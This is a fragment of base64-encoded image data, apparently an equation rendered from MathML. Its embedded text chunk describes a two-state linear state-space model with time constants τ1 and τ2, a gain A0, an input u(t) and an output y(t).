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Yz48bW4+MTwvbW4+PG1zdWI+PG1pPiYjeDNDNDs8L21pPjxtbj4xPC9tbj48L21zdWI+PC9tZnJhYz48L210ZD48bXRkPjxtbj4wPC9tbj48L210ZD48L210cj48bXRyPjxtdGQ+PG1uPjA8L21uPjwvbXRkPjxtdGQ+PG1vPi08L21vPjxtZnJhYz48bW4+MTwvbW4+PG1zdWI+PG1pPiYjeDNDNDs8L21pPjxtbj4yPC9tbj48L21zdWI+PC9tZnJhYz48L210ZD48L210cj48L210YWJsZT48L21mZW5jZWQ+PG10YWJsZT48bXRyLz48bXRyLz48L210YWJsZT48bWk+eDwvbWk+PG1mZW5jZWQ+PG1pPnQ8L21pPjwvbWZlbmNlZD48L21yb3c+PG1vPiYjeDJEOTs8L21vPjwvbW92ZXI+PG1vPiYjeEEwOzwvbW8+PG1vPis8L21vPjxtbz4mI3hBMDs8L21vPjxtZmVuY2VkIGNsb3NlPSJdIiBvcGVuPSJbIj48bXRhYmxlPjxtdHI+PG10ZD48bWZyYWM+PG1zdWI+PG1pPkE8L21pPjxtbj4wPC9tbj48L21zdWI+PG1zdWI+PG1pPiYjeDNDNDs8L21pPjxtbj4xPC9tbj48L21zdWI+PC9tZnJhYz48L210ZD48bXRkPjxtbj4wPC9tbj48L210ZD48L210cj48bXRyPjxtdGQ+PG1uPjA8L21uPjwvbXRkPjxtdGQ+PG1mcmFjPjxtc3ViPjxtaT5BPC9taT48bW4+MDwvbW4+PC9tc3ViPjxtc3ViPjxtaT4mI3gzQzQ7PC9taT48bW4+MjwvbW4+PC9tc3ViPjwvbWZyYWM+PC9tdGQ+PC9tdHI+PC9tdGFibGU+PC9tZmVuY2VkPjxtaT51PC9taT48bWZlbmNlZD48bWk+dDwvbWk+PC9tZmVuY2VkPjxtbz4sPC9tbz48bW8+JiN4QTA7PC9tbz48bW8+JiN4QTA7PC9tbz48bW8+JiN4QTA7PC9tbz48bW8+JiN4QTA7PC9tbz48bW8+JiN4QTA7PC9tbz48bWk+eTwvbWk+PG1mZW5jZWQ+PG1pPnQ8L21pPjwvbWZlbmNlZD48bW8+JiN4QTA7PC9tbz48bW8+PTwvbW8+PG1vPiYjeEEwOzwvbW8+PG1mZW5jZWQgY2xvc2U9Il0iIG9wZW49IlsiPjxtdGFibGU+PG10cj48bXRkPjxtbj4xPC9tbj48L210ZD48bXRkPjxtbj4xPC9tbj48L210ZD48L210cj48L210YWJsZT48L21mZW5jZWQ+PG1pPng8L21pPjxtZmVuY2VkPjxtaT50PC9taT48L21mZW5jZWQ+PC9tc3R5bGU+PC9tYXRoP